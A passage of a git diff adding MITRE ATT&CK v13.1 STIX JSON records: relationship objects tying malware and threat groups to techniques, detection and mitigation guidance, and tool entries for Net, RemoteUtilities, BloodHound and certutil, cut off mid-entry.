a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffc0ed92-9331-49c6-bb04-0ed1419c18cb.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffc0ed92-9331-49c6-bb04-0ed1419c18cb.json new file mode 100644 index 0000000000000000000000000000000000000000..516a68cd3a4ca5e0e18728a82c618169896a7870 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffc0ed92-9331-49c6-bb04-0ed1419c18cb.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--e3801378-a327-4185-a6e7-70301b6d48e7", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ffc0ed92-9331-49c6-bb04-0ed1419c18cb", + "type": "relationship", + "created": "2022-03-30T14:26:51.832Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-03-30T14:26:51.832Z", + "description": "Monitor for changes made to AD settings that may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls.", + "source_ref": "x-mitre-data-component--5b8b466b-2c81-4fe7-946f-d677a74ae3db", + "target_ref": "attack-pattern--dcaa092b-7de9-4a21-977f-7fcb77e89c48", + "relationship_type": "detects", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffc74c74-bc06-4f08-96ef-5239341bc2ec.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffc74c74-bc06-4f08-96ef-5239341bc2ec.json new file mode 100644 index 0000000000000000000000000000000000000000..904e7845574b43a92670be9825afc9e80e7ca6fd --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffc74c74-bc06-4f08-96ef-5239341bc2ec.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--e122be4f-5ed1-4387-b015-caac7cc75be6", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ffc74c74-bc06-4f08-96ef-5239341bc2ec", + "type": "relationship", + "created": "2022-03-30T14:26:51.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-03-30T14:26:51.854Z", + "description": "Monitor for alike file hashes or characteristics (ex: filename) that are created on multiple hosts.", + "source_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5", + "target_ref": "attack-pattern--bf90d72c-c00b-45e3-b3aa-68560560d4c5", + "relationship_type": "detects", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffccbf64-ef54-47c7-a117-389b5eca8047.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffccbf64-ef54-47c7-a117-389b5eca8047.json new file mode 100644 index 0000000000000000000000000000000000000000..94b07bc2bdc6ab31e2f39126be21ded228e3d08a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffccbf64-ef54-47c7-a117-389b5eca8047.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--c51b24c0-f31a-4c4a-850f-f709b973cfb6", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ffccbf64-ef54-47c7-a117-389b5eca8047", + "created": "2022-04-14T16:38:09.733Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Periodically baseline instances to identify malicious modifications or additions.", + "modified": "2022-04-14T16:38:09.733Z", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--45fd904d-6eb0-4b50-8478-a961f09f898b", + "target_ref": "attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffcfa61b-2b35-4d06-9298-836fe50f5bed.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffcfa61b-2b35-4d06-9298-836fe50f5bed.json new file mode 100644 index 0000000000000000000000000000000000000000..e8288bce776445b08b7ac1227510d671f481ffe6 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffcfa61b-2b35-4d06-9298-836fe50f5bed.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--97f3087c-ee5b-457a-a59f-a7ba7787b674", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ffcfa61b-2b35-4d06-9298-836fe50f5bed", + "type": "relationship", + "created": "2022-02-07T16:07:49.556Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "BiZone Lizar May 2021", + "url": "https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319", + "description": "BI.ZONE Cyber Threats Research Team. (2021, May 13). From pentest to APT attack: cybercriminal group FIN7 disguises its malware as an ethical hacker\u2019s toolkit. Retrieved February 2, 2022." + } + ], + "modified": "2022-02-07T16:07:49.556Z", + "description": "[Lizar](https://attack.mitre.org/software/S0681) has a plugin to retrieve information about all active network sessions on the infected server.(Citation: BiZone Lizar May 2021)", + "relationship_type": "uses", + "source_ref": "malware--f74a5069-015d-4404-83ad-5ca01056c0dc", + "target_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffd3ead2-b1a0-46fa-adf0-d13ece7597e8.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffd3ead2-b1a0-46fa-adf0-d13ece7597e8.json new file mode 100644 index 0000000000000000000000000000000000000000..1ee77745403cfee6f5aa7c316e06b97d14caef20 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffd3ead2-b1a0-46fa-adf0-d13ece7597e8.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--7cd09348-4eea-4c65-b15a-b734da3043d5", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ffd3ead2-b1a0-46fa-adf0-d13ece7597e8", + "created": "2023-03-06T23:27:22.298Z", + "revoked": false, + "external_references": [ + { + "source_name": "Secureworks DarkTortilla Aug 2022", + "description": "Secureworks Counter Threat Unit Research Team. (2022, August 17). DarkTortilla Malware Analysis. Retrieved November 3, 2022.", + "url": "https://www.secureworks.com/research/darktortilla-malware-analysis" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-06T23:27:22.298Z", + "description": "[DarkTortilla](https://attack.mitre.org/software/S1066) has used HTTP and HTTPS for C2.(Citation: Secureworks DarkTortilla Aug 2022)", + "relationship_type": "uses", + "source_ref": "malware--5faaf81a-aa5b-4a4b-bae5-522439e068f8", + "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffe0659a-ff5b-4ffb-a842-38bb630fd6b8.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffe0659a-ff5b-4ffb-a842-38bb630fd6b8.json new file mode 100644 index 0000000000000000000000000000000000000000..2ebb80377bed07ac8dfd3a67c7281e08b562211c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffe0659a-ff5b-4ffb-a842-38bb630fd6b8.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--590a0e45-8bc9-40ae-a83e-6cf1290a0888", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ffe0659a-ff5b-4ffb-a842-38bb630fd6b8", + "type": "relationship", + "created": "2021-11-22T15:02:15.265Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-03-08T20:59:20.895Z", + "description": "Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--90f39ee1-d5a3-4aaa-9f28-3b42815b0d46", + "target_ref": "attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffe85478-e3ed-4856-b4ae-03a7b693e381.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffe85478-e3ed-4856-b4ae-03a7b693e381.json new file mode 100644 index 0000000000000000000000000000000000000000..8cbeb7f0e8d422bc1c637c737a744247004ef6a1 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffe85478-e3ed-4856-b4ae-03a7b693e381.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--0575f5a0-a0d2-4c3b-a8b7-c1a2e13dcd46", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ffe85478-e3ed-4856-b4ae-03a7b693e381", + "created": "2022-08-09T18:36:00.430Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Unit 42 PingPull Jun 2022", + "description": "Unit 42. (2022, June 13). GALLIUM Expands Targeting Across Telecommunications, Government and Finance Sectors With New PingPull Tool. Retrieved August 7, 2022.", + "url": "https://unit42.paloaltonetworks.com/pingpull-gallium/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:40:38.950Z", + "description": "[PingPull](https://attack.mitre.org/software/S1031) can use AES, in cipher block chaining (CBC) mode padded with PKCS5, to encrypt C2 server communications.(Citation: Unit 42 PingPull Jun 2022)", + "relationship_type": "uses", + "source_ref": "malware--3a0f6128-0a01-421d-8eca-e57d8671b1f1", + "target_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffecf9e6-6966-4535-934f-4fd4696875b0.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffecf9e6-6966-4535-934f-4fd4696875b0.json new file mode 100644 index 0000000000000000000000000000000000000000..63563210596de5204637a015d28a8f12abd4469e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffecf9e6-6966-4535-934f-4fd4696875b0.json @@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--3aa1c320-f4e3-4970-860d-042bb23b46d2", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ffecf9e6-6966-4535-934f-4fd4696875b0", + "type": "relationship", + "created": "2020-08-13T16:45:46.972Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Threatpost Hancitor", + "url": "https://threatpost.com/spammers-revive-hancitor-downloader-campaigns/123011/", + "description": "Tom Spring. (2017, January 11). Spammers Revive Hancitor Downloader Campaigns. Retrieved August 13, 2020." + }, + { + "source_name": "FireEye Hancitor", + "url": "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", + "description": "Anubhav, A., Jallepalli, D. (2016, September 23). Hancitor (AKA Chanitor) observed using multiple attack approaches. Retrieved August 13, 2020." + } + ], + "modified": "2020-09-02T19:54:00.926Z", + "description": "[Hancitor](https://attack.mitre.org/software/S0499) has decoded Base64 encoded URLs to insert a recipient\u2019s name into the filename of the Word document. [Hancitor](https://attack.mitre.org/software/S0499) has also extracted executables from ZIP files.(Citation: Threatpost Hancitor)(Citation: FireEye Hancitor)", + "relationship_type": "uses", + "source_ref": "malware--ef2247bf-8062-404b-894f-d65d00564817", + "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffee4cd1-f193-4dbc-9f47-6fe47e1523eb.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffee4cd1-f193-4dbc-9f47-6fe47e1523eb.json new file mode 100644 index 0000000000000000000000000000000000000000..f4f736fc13865c954804b4d71420f10308c34355 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffee4cd1-f193-4dbc-9f47-6fe47e1523eb.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--6e40e529-efaf-449a-bbed-4de748618039", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ffee4cd1-f193-4dbc-9f47-6fe47e1523eb", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "PWC Cloud Hopper April 2017", + "url": "https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf", + "description": "PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[menuPass](https://attack.mitre.org/groups/G0045) has used DLL search order hijacking.(Citation: PWC Cloud Hopper April 2017)", + "modified": "2022-07-20T20:07:40.187Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "intrusion-set--222fbd21-fc4f-4b7e-9f85-0e6e3a76c33f", + "target_ref": "attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fff3195c-ef40-4e11-b0f3-f1a849b2b316.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fff3195c-ef40-4e11-b0f3-f1a849b2b316.json new file mode 100644 index 0000000000000000000000000000000000000000..19f0e861c8e40cecfa4df28dc5aee06ceab7c1fe --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fff3195c-ef40-4e11-b0f3-f1a849b2b316.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--13d28e85-3eb8-4ffa-a992-7973ddc254f5", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fff3195c-ef40-4e11-b0f3-f1a849b2b316", + "created": "2022-07-21T17:01:09.524Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "TrendMicro EarthLusca 2022", + "description": "Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca\u2019s Operations. Retrieved July 1, 2022.", + "url": "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-02T19:02:05.756Z", + "description": "[Earth Lusca](https://attack.mitre.org/groups/G1006) has sent spearphishing emails that required the user to click on a malicious link and subsequently open a decoy document with a malicious loader.(Citation: TrendMicro EarthLusca 2022)", + "relationship_type": "uses", + "source_ref": "intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034", + "target_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffff35dc-3741-4fba-9680-f0fbe321c0b0.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffff35dc-3741-4fba-9680-f0fbe321c0b0.json new file mode 100644 index 0000000000000000000000000000000000000000..360f814d0e77cb7bc33864c5cbff116f642d583e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffff35dc-3741-4fba-9680-f0fbe321c0b0.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--0a437a02-f637-4466-97d9-5f2cb8a7321c", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ffff35dc-3741-4fba-9680-f0fbe321c0b0", + "created": "2022-01-27T18:04:46.484Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Talos Bisonal Mar 2020", + "url": "https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html", + "description": "Mercer, W., et al. (2020, March 5). Bisonal: 10 years of play. Retrieved January 26, 2022." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": " [Bisonal](https://attack.mitre.org/software/S0268) dropped a decoy payload with a .jpg extension that contained a malicious Visual Basic script.(Citation: Talos Bisonal Mar 2020) ", + "modified": "2022-04-18T21:25:59.054Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--65ffc206-d7c1-45b3-b543-f6b726e7840d", + "target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffffed15-5695-44b9-b85b-89ba8187415d.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffffed15-5695-44b9-b85b-89ba8187415d.json new file mode 100644 index 0000000000000000000000000000000000000000..82de6561c3cd6222067d62e09824064c6c421c66 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffffed15-5695-44b9-b85b-89ba8187415d.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--8a51bf59-9c37-443b-a718-a74f7ac3a6c0", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ffffed15-5695-44b9-b85b-89ba8187415d", + "type": "relationship", + "created": "2019-09-24T14:19:05.322Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos ZxShell Oct 2014", + "url": "https://blogs.cisco.com/security/talos/opening-zxshell", + "description": "Allievi, A., et al. (2014, October 28). Threat Spotlight: Group 72, Opening the ZxShell. Retrieved September 24, 2019." + } + ], + "modified": "2022-01-05T16:34:01.994Z", + "description": "[ZxShell](https://attack.mitre.org/software/S0412) has a command to transfer files from a remote host.(Citation: Talos ZxShell Oct 2014) ", + "relationship_type": "uses", + "source_ref": "malware--cfc75b0d-e579-40ae-ad07-a1ce00d49a6c", + "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--03342581-f790-4f03-ba41-e82e67392e23.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--03342581-f790-4f03-ba41-e82e67392e23.json new file mode 100644 index 0000000000000000000000000000000000000000..b481219d006743b1274de4372acf4ff3ef4e7fc5 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--03342581-f790-4f03-ba41-e82e67392e23.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--02a1127d-828c-4e39-b21b-b11c837f860b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-03T16:49:41.059Z", + "name": "Net", + "description": "The [Net](https://attack.mitre.org/software/S0039) utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. (Citation: Microsoft Net Utility)\n\n[Net](https://attack.mitre.org/software/S0039) has a great deal of functionality, (Citation: Savill 1999) much of which is useful for an adversary, such as gathering system and network information for Discovery, moving laterally through [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) using net use commands, and interacting with services. The net1.exe utility is executed for certain functionality when net.exe is run and can be used directly in commands such as net1 user.", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "2.4", + "x_mitre_contributors": [ + "David Ferguson, CyberSponse" + ], + "x_mitre_aliases": [ + "Net", + "net.exe" + ], + "type": "tool", + "id": "tool--03342581-f790-4f03-ba41-e82e67392e23", + "created": "2017-05-31T21:32:31.601Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0039", + "external_id": "S0039" + }, + { + "source_name": "Microsoft Net Utility", + "description": "Microsoft. (2006, October 18). Net.exe Utility. Retrieved September 22, 2015.", + "url": "https://msdn.microsoft.com/en-us/library/aa939914" + }, + { + "source_name": "Savill 1999", + "description": "Savill, J. (1999, March 4). Net.exe reference. Retrieved September 22, 2015.", + "url": "http://windowsitpro.com/windows/netexe-reference" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--03c6e0ea-96d3-4b23-9afb-05055663cf4b.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--03c6e0ea-96d3-4b23-9afb-05055663cf4b.json new file mode 100644 index 0000000000000000000000000000000000000000..686d9cfb252bcaffef94297983f842b763a8aac4 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--03c6e0ea-96d3-4b23-9afb-05055663cf4b.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--a9e56009-375e-41d5-9707-bb7f2bb3cac1", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "RemoteUtilities" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--03c6e0ea-96d3-4b23-9afb-05055663cf4b", + "type": "tool", + "created": "2021-03-18T14:57:34.628Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0592", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0592" + }, + { + "source_name": "Trend Micro Muddy Water March 2021", + "url": "https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html", + "description": "Peretz, A. and Theck, E. (2021, March 5). Earth Vetala \u2013 MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021." + } + ], + "modified": "2021-04-25T23:30:38.375Z", + "name": "RemoteUtilities", + "description": "[RemoteUtilities](https://attack.mitre.org/software/S0592) is a legitimate remote administration tool that has been used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least 2021 for execution on target machines.(Citation: Trend Micro Muddy Water March 2021)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--066b057c-944e-4cfc-b654-e3dfba04b926.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--066b057c-944e-4cfc-b654-e3dfba04b926.json new file mode 100644 index 0000000000000000000000000000000000000000..e9a744eed92799bf7281f4c3c51bfc5b4a13df6a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--066b057c-944e-4cfc-b654-e3dfba04b926.json @@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--d868ddb1-4f5c-4976-a899-4bf00e1c7eb7", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-02-16T18:51:10.090Z", + "name": "BloodHound", + "description": "[BloodHound](https://attack.mitre.org/software/S0521) is an Active Directory (AD) reconnaissance tool that can reveal hidden relationships and identify attack paths within an AD environment.(Citation: GitHub Bloodhound)(Citation: CrowdStrike BloodHound April 2018)(Citation: FoxIT Wocao December 2019)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.4", + "x_mitre_aliases": [ + "BloodHound" + ], + "type": "tool", + "id": "tool--066b057c-944e-4cfc-b654-e3dfba04b926", + "created": "2020-10-28T12:51:29.358Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0521", + "external_id": "S0521" + }, + { + "source_name": "FoxIT Wocao December 2019", + "description": "Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China\u2019s hidden hacking groups. Retrieved October 8, 2020.", + "url": "https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf" + }, + { + "source_name": "CrowdStrike BloodHound April 2018", + "description": "Red Team Labs. (2018, April 24). Hidden Administrative Accounts: BloodHound to the Rescue. Retrieved October 28, 2020.", + "url": "https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/" + }, + { + "source_name": "GitHub Bloodhound", + "description": "Robbins, A., Vazarkar, R., and Schroeder, W. (2016, April 17). Bloodhound: Six Degrees of Domain Admin. Retrieved March 5, 2019.", + "url": "https://github.com/BloodHoundAD/BloodHound" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--0a68f1f1-da74-4d28-8d9a-696c082706cc.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--0a68f1f1-da74-4d28-8d9a-696c082706cc.json new file mode 100644 index 0000000000000000000000000000000000000000..fdfd561ed1cc324377414dc705cfcbcb3b3beb41 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--0a68f1f1-da74-4d28-8d9a-696c082706cc.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--a767661c-b3ca-4842-a9fb-99e4524e15cb", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-03T00:40:22.280Z", + "name": "certutil", + "description": "[certutil](https://attack.mitre.org/software/S0160) is a command-line utility that can be used to obtain certificate authority information and configure Certificate Services. (Citation: TechNet Certutil)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.3", + "x_mitre_aliases": [ + "certutil", + "certutil.exe" + ], + "type": 